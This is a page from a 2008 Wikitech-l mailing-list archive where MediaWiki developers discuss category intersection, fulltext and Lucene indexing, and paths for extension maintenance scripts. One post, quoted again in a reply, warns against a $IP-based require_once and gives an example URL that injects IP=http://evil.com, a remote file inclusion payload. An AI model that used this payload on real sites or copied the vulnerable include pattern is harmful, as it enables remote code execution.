Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Wikipedia: Wikitech

So... status of category intersections?

 

 

First page Previous page 1 2 3 Next page Last page  View All Wikipedia wikitech RSS feed   Index | Next | Previous | View Threaded


tstarling at wikimedia

Apr 23, 2008, 7:15 AM

Post #26 of 59 (953 views)
Permalink
Re: So... status of category intersections? [In reply to]

Andrew Garrett wrote:
> On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements <gmane [at] kennel17> wrote:
>> From an extension writer's point of view, the current situation is to put in
>> a relative require_once() line to commandLine.inc and hope that the file is
>> in the expected place.
>
> global $IP;
> require_once( "$IP/maintenance/commandLine.inc" );
>
> What am I missing?

Besides not working, that would be an arbitrary remote code execution
vulnerability:

http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://evil.com

A better way to do it is:

require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );

If that path doesn't exist, the sysadmin can create it. Scripts that rely
on the working directory being $IP or whatever are really annoying.

-- Tim Starling


_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


ssanbeg at ask

Apr 23, 2008, 8:29 AM

Post #27 of 59 (959 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:

> Steve Sanbeg schreef:
>>
>> So maybe it would make sense to develop an extension that would use the
>> category ID with an SMW like front end, using code broken off from both
>> extensions?
> Wouldn't it be better just to improve SMW's category handling?
>
> Roan Kattouw (Catrope)

That should be the end result. But it seems it's been decided that
SMW is too monolithic, and Markus has already offered to split parts into
smaller extensions, so this seems like the logical place to start.

-Steve



_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


gmane at kennel17

Apr 23, 2008, 8:38 AM

Post #28 of 59 (954 views)
Permalink
Re: So... status of category intersections? [In reply to]

"Tim Starling" <tstarling [at] wikimedia> wrote in
message news:fung8v$bon$1 [at] ger
> Andrew Garrett wrote:
> > On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements
<gmane [at] kennel17> wrote:
> >> From an extension writer's point of view, the current situation is to
put in
> >> a relative require_once() line to commandLine.inc and hope that the
file is
> >> in the expected place.
> >
> > global $IP;
> > require_once( "$IP/maintenance/commandLine.inc" );
> >
> > What am I missing?
>
> Besides not working, that would be an arbitrary remote code execution
> vulnerability:
>
>
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://e
vil.com
>

$IP is not defined at the point that the script is run. $IP is defined by
including commandLine.inc, so you're getting into a bit of a circular
scenario there... :-)


> A better way to do it is:
>
> require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
>
> If that path doesn't exist, the sysadmin can create it. Scripts that rely
> on the working directory being $IP or whatever are really annoying.
>

That is the current method, which causes problems as detailed in my previous
post. To expand on your point, scripts that rely on the extension being in
the extensions folder are also annoying.

We provide MediaWiki to our clients via a symlink in their web folder. They
have an 'extensions' folder in their home directory where they can add their
own extensions (the MW extensions folder is also used for the MW extensions
we have enabled globally and which we offer support for). Currently there
is no easy way for them to run the maintenance scripts for the extensions
they have locally installed without hacking the code to fix the paths.

- Mark Clements (HappyDog)




_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


gmane at kennel17

Apr 23, 2008, 8:38 AM

Post #29 of 59 (952 views)
Permalink
Re: So... status of category intersections? [In reply to]

"Simetrical" <Simetrical+wikilist [at] gmail>
wrote in message
news:7c2a12e20804221716xaa6f5cflf216ff28c6324015 [at] mail
> On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements wrote:
> > And, of course, it doesn't help when that's not the case, which is the
> > situation for us. For technical reasons, all extensions are outside
> > the MW source folder entirely.
>
> Symlinks work perfectly in that case (as is true for my localhost, for
> instance, since it's running a checked-out version of
> mediawiki/trunk/). I agree it's not great practice, though: maybe you
> could try to use the current working directory? That seems even less
> reliable.

I imagine an 'updateExtension' script in the 'maintenance' folder that
include()s the appropriate command line/site settings/etc. files then looks
for a script with the appropriate name (based on the extension name which is
supplied as first arg on command line - 'ExtName' in this example) in the
following places.

*/extensions/ExtName/maintenance.php
*/ExtName/maintenance.php

Where * means anywhere in the include path. If the file exists, run it with
the remaining arguments passed through, for which there should be a
standardised subset that most extensions use (e.g. 'install' and 'upgrade')
though extension-specific items are allowed. If no arg (or an unexpected
arg) is provided then the extension file is expected to print out the
details about available items (i.e. equivalent to 'help').

- Mark Clements (HappyDog)






_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


gerard.meijssen at gmail

Apr 23, 2008, 9:01 AM

Post #30 of 59 (959 views)
Permalink
Re: So... status of category intersections? [In reply to]

Hoi,
It would be cool if there were more clarity about this. Semantic MediaWiki
has been around for a long time. All the major criticisms of the past have
been dealt with. It cannot be said that the code is unknown or unknowable.
It has only one new command, it performs much better compared to last year,
it is being localised at Betawiki. I was told that even Wikia supports it on
request for its wikis...

Being able to break the SMW code into parts is indicative of code that is
build in a modular way. SMW would make a bigger difference in my mind then
the introduction of catalogs. It would be a massive boost to our aim to make
information available to the world.

Truly, if Semantic MediaWiki is not to be considered be at least clear why.
The alternative is unpleasant speculations and technical solutions that are
considered not necessarily the best.

Thanks,
GerardM

On Wed, Apr 23, 2008 at 5:29 PM, Steve Sanbeg <ssanbeg [at] ask> wrote:

> On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
>
> > Steve Sanbeg schreef:
> >>
> >> So maybe it would make sense to develop an extension that would use the
> >> category ID with an SMW like front end, using code broken off from both
> >> extensions?
> > Wouldn't it be better just to improve SMW's category handling?
> >
> > Roan Kattouw (Catrope)
>
> That should be the end result. But it seems it's been decided that
> SMW is too monolithic, and Markus has already offered to split parts into
> smaller extensions, so this seems like the logical place to start.
>
> -Steve
>
>
>
> _______________________________________________
> Wikitech-l mailing list
> Wikitech-l [at] lists
> https://lists.wikimedia.org/mailman/listinfo/wikitech-l
>
_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


aerik at thesylvans

Apr 23, 2008, 10:10 AM

Post #31 of 59 (957 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Tue, 22 Apr 2008, Simetrical wrote:

>
> On Tue, Apr 22, 2008 at 10:59 AM, Roan Kattouw <roan.kattouw [at] home>
> wrote:
> > I missed the explanation of the fulltext implementation. Something like
> > 'Foo With_spaces Bar' and then do a fulltext search for the cats you
> > need? That would be more powerful, and would probably be faster for
> > complex intersections. I'll write an alternative to
> > CategoryIntersections that uses the fulltext schema and run some
> > benchmarks. I expect to have some results by the end of the week.
>
> Aerik Sylvan has already done an implementation of the backend using
> CLucene. If a front-end could be done in core, with a pluggable
> backend, that might have the best chance of getting enabled on
> Wikimedia relatively quickly. MyISAM fulltext is not necessarily
> going to be fast enough due to the locking.
>
>
Yes, I did a fulltext search (which works quite well - I forget the response
times... I think it was around a third of a second even for intersections of
large groups, like "Living_People") and the way it handles booleans and
stuff is quite nice. I think I broke it when I moved servers, but I can put
it back up. I think it would probably be a great addition to core, and
would be very adequate for small wikis, but too slow for larger ones
(performance at a few tenths of a second will really add up with tens or
hundreds of hits...) I think doing updates is also an issue on large wikis,
due to table locking of the MyISAM table. But, I think it will be fine for
small wikis. MySQL doesn't break on underscores, so using the category as
it appears in the url seems to work great for fulltext search, and the built
in fulltext search is *much* faster than doing lookups on the categorylinks
table, especially for large sets.

So, I'd propose in core we add a MyISAM table with a fulltext index of
categories - this will suite small wikis. For big wikis, make this a InnoDB
table and use it to build a Lucene index, which you'd search with whatever
flavor of Lucene you like. This is a fairly straight path, that covers both
core and large wikis, should have good performance for either application,
and is flexible in that it does boolean searches. I don't have suggestions
for an interface, but why not just start with a SpecialPage and see what
happens? Once the functionality is there, suggestions for how to better use
it will come out of the woodwork.

I'm working on a CLucene daemon (calling it clucened, which is on SF - with
slightly out-of-date source in subversion - and at clucened.com), which
could be used for this, or anything else. I'm planning to make it Solr
compatible, but not a direct port of Solr, and the implementation will have
some differences. So far I have only the daemon and the search function
(takes a raw query, which can be boolean or have mulitple fields, and passes
it through). I think this is really cool, but if we already have a GCJ
Lucene search for En, it may be easier just to extend that to read at
categories Lucene index than use another architecture. Either way, I think
a search daemon will find an audience and will be a really cool thing :-)


Aerik

--
http://www.wikidweb.com - the Wiki Directory of the Web
http://tagthis.info - Hosted Tagging for your website!
_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


roan.kattouw at home

Apr 23, 2008, 12:45 PM

Post #32 of 59 (951 views)
Permalink
Re: So... status of category intersections? [In reply to]

Aerik Sylvan schreef:
> Yes, I did a fulltext search (which works quite well - I forget the
> response
> times... I think it was around a third of a second even for intersections of
> large groups, like "Living_People") and the way it handles booleans and
> stuff is quite nice. I think I broke it when I moved servers, but I can put
> it back up. I think it would probably be a great addition to core, and
> would be very adequate for small wikis, but too slow for larger ones
> (performance at a few tenths of a second will really add up with tens or
> hundreds of hits...) I think doing updates is also an issue on large wikis,
> due to table locking of the MyISAM table. But, I think it will be fine for
> small wikis. MySQL doesn't break on underscores, so using the category as
> it appears in the url seems to work great for fulltext search, and the built
> in fulltext search is *much* faster than doing lookups on the categorylinks
> table, especially for large sets.
>
What I was actually wondering is how fulltext compares to
MinuteElectron's categoryintersections table (see posts earlier this
week), but I guess fulltext will be faster, especially for complex queries.
> So, I'd propose in core we add a MyISAM table with a fulltext index of
> categories - this will suite small wikis. For big wikis, make this a InnoDB
> table and use it to build a Lucene index, which you'd search with whatever
> flavor of Lucene you like. This is a fairly straight path, that covers both
> core and large wikis, should have good performance for either application,
> and is flexible in that it does boolean searches. I don't have suggestions
> for an interface, but why not just start with a SpecialPage and see what
> happens? Once the functionality is there, suggestions for how to better use
> it will come out of the woodwork.
That SpecialPage is present in the CategoryIntersections extension,
you'd just need to change the backend code.

Roan Kattouw (Catrope)

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


dgerard at gmail

Apr 23, 2008, 12:48 PM

Post #33 of 59 (950 views)
Permalink
Re: So... status of category intersections? [In reply to]

2008/4/23 Aerik Sylvan <aerik [at] thesylvans>:

> Yes, I did a fulltext search (which works quite well - I forget the response
> times... I think it was around a third of a second even for intersections of
> large groups, like "Living_People") and the way it handles booleans and
> stuff is quite nice. I think I broke it when I moved servers, but I can put
> it back up. I think it would probably be a great addition to core, and
> would be very adequate for small wikis, but too slow for larger ones
> (performance at a few tenths of a second will really add up with tens or
> hundreds of hits...)


What's the actual rate of searches on en:wp?


- d.

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


Simetrical+wikilist at gmail

Apr 23, 2008, 12:53 PM

Post #34 of 59 (951 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Wed, Apr 23, 2008 at 3:48 PM, David Gerard <dgerard [at] gmail> wrote:
> What's the actual rate of searches on en:wp?

For what, category intersections? Zero; the feature isn't enabled. :)

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


brion at wikimedia

Apr 23, 2008, 12:59 PM

Post #35 of 59 (949 views)
Permalink
Re: So... status of category intersections? [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

David Gerard wrote:
> 2008/4/23 Aerik Sylvan <aerik [at] thesylvans>:
>
>> Yes, I did a fulltext search (which works quite well - I forget the response
>> times... I think it was around a third of a second even for intersections of
>> large groups, like "Living_People") and the way it handles booleans and
>> stuff is quite nice. I think I broke it when I moved servers, but I can put
>> it back up. I think it would probably be a great addition to core, and
>> would be very adequate for small wikis, but too slow for larger ones
>> (performance at a few tenths of a second will really add up with tens or
>> hundreds of hits...)
>
>
> What's the actual rate of searches on en:wp?

At this moment, about 184 searches per second on all sites together,
spread over 16 backend servers. (Not sure offhand which are just enwiki.)

http://ganglia.wikimedia.org/pmtpa/?m=search_rate&c=Search

- -- brion vibber (brion @ wikimedia.org)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkgPlRgACgkQwRnhpk1wk44zkwCgiHmZIFBSKAaY6RtuhnRcCSFC
VMsAn1L8FpMUL2yDJsd26nz8Ar2aRwkM
=c4JS
-----END PGP SIGNATURE-----

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


brion at wikimedia

Apr 23, 2008, 1:00 PM

Post #36 of 59 (955 views)
Permalink
Re: So... status of category intersections? [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Aerik Sylvan wrote:
> So, I'd propose in core we add a MyISAM table with a fulltext index of
> categories - this will suite small wikis.

Probably reasonable...

> For big wikis, make this a InnoDB
> table and use it to build a Lucene index, which you'd search with whatever
> flavor of Lucene you like.

Probably also reasonable. :)

Should check whether Robert's already hacked some of this stuff into the
lucene server or what changes it would require.

- -- brion vibber (brion @ wikimedia.org)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkgPlW8ACgkQwRnhpk1wk47B1QCgjrktFMS9/FdWVHkHzePFV73O
S9oAnjtZNNtUcBwxW++nGAVwc8eRmWhn
=ly7g
-----END PGP SIGNATURE-----

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


minuteelectron at googlemail

Apr 23, 2008, 1:11 PM

Post #37 of 59 (950 views)
Permalink
Re: So... status of category intersections? [In reply to]

Roan Kattouw wrote:
> What I was actually wondering is how fulltext compares to
> MinuteElectron's categoryintersections table (see posts earlier this
> week), but I guess fulltext will be faster, especially for complex queries.
>
Just to clarify I have made no categoryintersection extension of any
sort, it is Magnus'.

MinuteElectron.


_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


roan.kattouw at home

Apr 23, 2008, 1:34 PM

Post #38 of 59 (956 views)
Permalink
Re: So... status of category intersections? [In reply to]

Brion Vibber schreef:
> Should check whether Robert's already hacked some of this stuff into the
> lucene server or what changes it would require.
>
>
If I understand correctly, Lucene shouldn't really care what it stores,
as long as it's text and it's searchable. Storing "Living_people
Articles_needing_cleanup" would work just fine, right? We do need to
think about case-sensitivity, though.

Roan Kattouw (Catrope)

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


rainmansr at gmail

Apr 23, 2008, 2:06 PM

Post #39 of 59 (957 views)
Permalink
Re: So... status of category intersections? [In reply to]

Roan Kattouw wrote:

>Brion Vibber schreef:
>
>
>>Should check whether Robert's already hacked some of this stuff into the
>>lucene server or what changes it would require.
>>
>>
>>
>>
>If I understand correctly, Lucene shouldn't really care what it stores,
>as long as it's text and it's searchable. Storing "Living_people
>Articles_needing_cleanup" would work just fine, right? We do need to
>think about case-sensitivity, though.
>
>

Let me briefly repeat what I said earlier about my experience with this
category
intersection thingy. Adding categories to lucene index is easy *IF* they
are inside
the article, e.g. try this:

http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=%2Bincategory%3A%22Living+people%22+%2Bincategory%3A%22English+comedy+writers%22&ns0=1&fulltext=Search

This will give you category intersection of "Living People" and "English
comedy writers"
in fraction of the second.

What I found that the hard part is keeping the index updated. If we want
a fancy category
intersection system discussed here before we need to have an index that
is frequently updated,
that will be integrated with the job queue, that will understand
templates etc..

Lucene is not that good with very frequent updates. The usual setting is
to have an indexer,
make snapshots of the index at regular intervals and then rsync it onto
searchers. The whole
process takes time, although for a category-only index it will probably
be fast. I assume there
would be at least few tens of minutes lag anyhow. Our current lucene
framework could
easily be used for index distribution and such.

What remains unsolved, however, is keeping the index updated with the
latest changes
on the site. If one changes a template with a category in it, the thing
goes on the job queue.
I assume there would need to be some kind of hook that will either log
the change somewhere
or send data to lucene somehow. This is the part of the backend that
needs thinking and solving.

r.



_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


roan.kattouw at home

Apr 24, 2008, 4:40 AM

Post #40 of 59 (937 views)
Permalink
Re: So... status of category intersections? [In reply to]

Robert Stojnic schreef:
>
> Let me briefly repeat what I said earlier about my experience with this
> category
> intersection thingy. Adding categories to lucene index is easy *IF* they
> are inside
> the article, e.g. try this:
>
> http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=%2Bincategory%3A%22Living+people%22+%2Bincategory%3A%22English+comedy+writers%22&ns0=1&fulltext=Search
>
> This will give you category intersection of "Living People" and "English
> comedy writers"
> in fraction of the second.
>
> What I found that the hard part is keeping the index updated. If we want
> a fancy category
> intersection system discussed here before we need to have an index that
> is frequently updated,
> that will be integrated with the job queue, that will understand
> templates etc..
>
You don't need the article text, just query the categorylinks table.
> Lucene is not that good with very frequent updates. The usual setting is
> to have an indexer,
> make snapshots of the index at regular intervals and then rsync it onto
> searchers. The whole
> process takes time, although for a category-only index it will probably
> be fast. I assume there
> would be at least few tens of minutes lag anyhow. Our current lucene
> framework could
> easily be used for index distribution and such.
>
Categories don't change that often, so I don't think 10 minutes of lag
is that bad.
> What remains unsolved, however, is keeping the index updated with the
> latest changes
> on the site. If one changes a template with a category in it, the thing
> goes on the job queue.
> I assume there would need to be some kind of hook that will either log
> the change somewhere
> or send data to lucene somehow. This is the part of the backend that
> needs thinking and solving.
>
There's the LinksUpdate hook, which is also used in Magnus's implementation.

Roan Kattouw (Catrope)

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


aerik at thesylvans

Apr 24, 2008, 10:06 AM

Post #41 of 59 (947 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Wed, 23 Apr 2008, Robert Stojnic wrote:

>
> Roan Kattouw wrote:
>
> >Brion Vibber schreef:
> >
> >>Should check whether Robert's already hacked some of this stuff into the
> >>lucene server or what changes it would require.
> >>
> >>
> >If I understand correctly, Lucene shouldn't really care what it stores,
> >as long as it's text and it's searchable. Storing "Living_people
> >Articles_needing_cleanup" would work just fine, right? We do need to
> >think about case-sensitivity, though.
> >
>
> Let me briefly repeat what I said earlier about my experience with this
> category
> intersection thingy. Adding categories to lucene index is easy *IF* they
> are inside
> the article, e.g. try this:
>
>
> http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=%2Bincategory%3A%22Living+people%22+%2Bincategory%3A%22English+comedy+writers%22&ns0=1&fulltext=Search
>
> This will give you category intersection of "Living People" and "English
> comedy writers"
> in fraction of the second.
>

Hey Robert,
That is really cool - but it seems to be doing a text match on the whole
article, not just the categories... ?


>
> What I found that the hard part is keeping the index updated. If we want
> a fancy category
> intersection system discussed here before we need to have an index that
> is frequently updated,
> that will be integrated with the job queue, that will understand
> templates etc..
>

That is always the hurdle with Lucene, right? It doesn't do updates, just
delete, re-add, and then optimize (and I'd guess optimizing can get
resource-intensive on a big index).


>
> Lucene is not that good with very frequent updates. The usual setting is
> to have an indexer,
> make snapshots of the index at regular intervals and then rsync it onto
> searchers. The whole
> process takes time, although for a category-only index it will probably
> be fast. I assume there
> would be at least few tens of minutes lag anyhow. Our current lucene
> framework could
> easily be used for index distribution and such.
>
> What remains unsolved, however, is keeping the index updated with the
> latest changes
> on the site. If one changes a template with a category in it, the thing
> goes on the job queue.
> I assume there would need to be some kind of hook that will either log
> the change somewhere
> or send data to lucene somehow. This is the part of the backend that
> needs thinking and solving.
>

Well... this isn't a complete plan, just some thoughts (and maybe they're
naive, but I'll give it a shot anyway). I'm thinking of a new table that
holds the pageid and a text field that holds the category strings, leaving
the underscores in place. This gets updated via hook at the same time an
edit triggers an update to the categorylinks table (not familiar enough with
the code to have that data at hand) - this will handle categories in
templates etc (leverage the logic that already deals with this). Okay, so
once you build the table, the updates to that table aren't too bad. In
core, this would be a MyISAM table with a fulltext index. For larger wikis,
this is an innodb table.

Then the question (the one I think you're raising) is at what point do we
refresh or update the lucene index from that table? I'm not sure of the
best answer to that question. Is it feasible to do delete/add every time a
category is changed, and then optimize once a day or something? (probably
not, eh?)

What are we doing for the main search index? rebuild daily or so? In an
initial implementation, why not follow the same type of schedule?
Alternately, perhaps do an update and optimize once an hour? Guess it
depends on how much time/resources it takes to update and optimize the
index... But certainly using the same schedule as the main index is a safe
and conservative plan?

Best Regards,
Aerik



--
http://www.wikidweb.com - the Wiki Directory of the Web
http://tagthis.info - Hosted Tagging for your website!
_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


rainmansr at gmail

Apr 24, 2008, 10:20 AM

Post #42 of 59 (940 views)
Permalink
Re: So... status of category intersections? [In reply to]

>Hey Robert,
>That is really cool - but it seems to be doing a text match on the whole
>article, not just the categories... ?
>
>

No, that actually does category intersection. It's just that the
highlighted text is rather random. /me goes to fix that.

>What are we doing for the main search index? rebuild daily or so? In an
>initial implementation, why not follow the same type of schedule?
>Alternately, perhaps do an update and optimize once an hour? Guess it
>depends on how much time/resources it takes to update and optimize the
>index... But certainly using the same schedule as the main index is a safe
>and conservative plan?
>
>

I guess one would need to try and see. Once Simetrical finishes the
frontend, one could make different backends and see if the update thing
can be worked out nicely.

r.


_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


Simetrical+wikilist at gmail

Apr 24, 2008, 10:31 AM

Post #43 of 59 (937 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Thu, Apr 24, 2008 at 1:20 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
> Once Simetrical finishes the frontend

. . . or someone does. :)

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


bryan.tongminh at gmail

Apr 24, 2008, 11:22 AM

Post #44 of 59 (935 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Wed, Apr 23, 2008 at 11:06 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
> What remains unsolved, however, is keeping the index updated with the
> latest changes
> on the site. If one changes a template with a category in it, the thing
> goes on the job queue.
> I assume there would need to be some kind of hook that will either log
> the change somewhere
> or send data to lucene somehow. This is the part of the backend that
> needs thinking and solving.
>
LinksUpdateComplete hook?

Bryan

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


bryan.tongminh at gmail

Apr 24, 2008, 11:22 AM

Post #45 of 59 (937 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Wed, Apr 23, 2008 at 11:06 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
> What remains unsolved, however, is keeping the index updated with the
> latest changes
> on the site. If one changes a template with a category in it, the thing
> goes on the job queue.
> I assume there would need to be some kind of hook that will either log
> the change somewhere
> or send data to lucene somehow. This is the part of the backend that
> needs thinking and solving.
>
LinksUpdateComplete hook?

Bryan

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


rainmansr at gmail

Apr 24, 2008, 11:33 AM

Post #46 of 59 (942 views)
Permalink
Re: So... status of category intersections? [In reply to]

Bryan Tong Minh wrote:

>On Wed, Apr 23, 2008 at 11:06 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
>
>
>> What remains unsolved, however, is keeping the index updated with the
>> latest changes
>> on the site. If one changes a template with a category in it, the thing
>> goes on the job queue.
>> I assume there would need to be some kind of hook that will either log
>> the change somewhere
>> or send data to lucene somehow. This is the part of the backend that
>> needs thinking and solving.
>>
>>
>>
>LinksUpdateComplete hook?
>
>

Something like that, yes, but hook probably couldn't just connect to the
lucene indexer and queue updates, since the indexer might be down for
this or that reason... It might be a better solution to put updates into
some table with date attached and then let the indexer fetch updates.

r.


_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


roan.kattouw at home

Apr 24, 2008, 12:13 PM

Post #47 of 59 (936 views)
Permalink
Re: So... status of category intersections? [In reply to]

Robert Stojnic schreef:
> Something like that, yes, but hook probably couldn't just connect to the
> lucene indexer and queue updates, since the indexer might be down for
> this or that reason... It might be a better solution to put updates into
> some table with date attached and then let the indexer fetch updates.
>
>
Maybe use the job queue for this? We could put pending updates in the
job queue, and re-add the job if the indexer is down.

Roan Kattouw (Catrope)

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


bryan.tongminh at gmail

Apr 24, 2008, 12:23 PM

Post #48 of 59 (937 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Thu, Apr 24, 2008 at 8:33 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
>
> Bryan Tong Minh wrote:
>
> >On Wed, Apr 23, 2008 at 11:06 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
> >
> >
> >> What remains unsolved, however, is keeping the index updated with the
> >> latest changes
> >> on the site. If one changes a template with a category in it, the thing
> >> goes on the job queue.
> >> I assume there would need to be some kind of hook that will either log
> >> the change somewhere
> >> or send data to lucene somehow. This is the part of the backend that
> >> needs thinking and solving.
> >>
> >>
> >>
> >LinksUpdateComplete hook?
> >
> >
>
> Something like that, yes, but hook probably couldn't just connect to the
> lucene indexer and queue updates, since the indexer might be down for
> this or that reason... It might be a better solution to put updates into
> some table with date attached and then let the indexer fetch updates.
>
>
Hmm too bad we don't have a recentlinkchanges table.
(https://bugzilla.wikimedia.org/show_bug.cgi?id=13588)

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


ssanbeg at ask

Apr 24, 2008, 2:09 PM

Post #49 of 59 (940 views)
Permalink
Re: So... status of category intersections? [In reply to]

Well, I can only offer my 2 cents, from my fairly limited experience with
it.

It seems that what's mostly needed now is a front end for category
intersection. The one new function you talk about, and its associated
special pages, are the only implementation of that that I'm aware of.

However, the back end probably has issues, since support for that in core
has only recently been enhanced, and there is still ongoing work, which
would benefit SMW.

Attributes seem to add more complexity and have some more issues that
would need to be worked on. I think that should be a lower priority than
splitting the code. I.e. a core Semantic Mediawiki that just uses the
existing database schema & namespaces, and another extension to add
arbitrary tagging/relations.

On Wed, 23 Apr 2008 18:01:54 +0200, Gerard Meijssen wrote:

> Hoi,
> It would be cool if there were more clarity about this. Semantic MediaWiki
> has been around for a long time. All the major criticisms of the past have
> been dealt with. It cannot be said that the code is unknown or unknowable.
> It has only one new command, it performs much better compared to last year,
> it is being localised at Betawiki. I was told that even Wikia supports it on
> request for its wikis...
>
> Being able to break the SMW code into parts is indicative of code that is
> build in a modular way. SMW would make a bigger difference in my mind then
> the introduction of catalogs. It would be a massive boost to our aim to make
> information available to the world.
>
> Truly, if Semantic MediaWiki is not to be considered be at least clear why.
> The alternative is unpleasant speculations and technical solutions that are
> considered not necessarily the best.
>
> Thanks,
> GerardM
>
> On Wed, Apr 23, 2008 at 5:29 PM, Steve Sanbeg <ssanbeg [at] ask> wrote:
>
>> On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
>>
>> > Steve Sanbeg schreef:
>> >>
>> >> So maybe it would make sense to develop an extension that would use the
>> >> category ID with an SMW like front end, using code broken off from both
>> >> extensions?
>> > Wouldn't it be better just to improve SMW's category handling?
>> >
>> > Roan Kattouw (Catrope)
>>
>> That should be the end result. But it seems it's been decided that
>> SMW is too monolithic, and Markus has already offered to split parts into
>> smaller extensions, so this seems like the logical place to start.
>>
>> -Steve
>>
>>
>>
>> _______________________________________________
>> Wikitech-l mailing list
>> Wikitech-l [at] lists
>> https://lists.wikimedia.org/mailman/listinfo/wikitech-l
>>



_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


dgerard at gmail

Apr 24, 2008, 2:57 PM

Post #50 of 59 (944 views)
Permalink
Re: So... status of category intersections? [In reply to]

2008/4/24 Steve Sanbeg <ssanbeg [at] ask>:

> It seems that what's mostly needed now is a front end for category
> intersection. The one new function you talk about, and its associated
> special pages, are the only implementation of that that I'm aware of.


Um, yes. What do we want as an interface?

1. A search interface:"Enter tags:"

2. For [[Category:Left-handed living Jewish American lesbian poets of
Martian citizenship]] to automatically populate from the intersection
of tags "Left-handed people", "Living people", "Jewish people",
"American people", "Lesbians", "Poets" and "Martian citizens".

The second is harder but lets us preserve the querulously tiny
subcategories for backward compatibility. OTOH, luring people prone to
idiot wiki flamewars into an idiot wiki flamewar keeps them too busy
to mess up anything important. So let's not regard 2. as being a
blocker in any way whatsoever.


- d.

_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l

First page Previous page 1 2 3 Next page Last page  View All Wikipedia wikitech RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.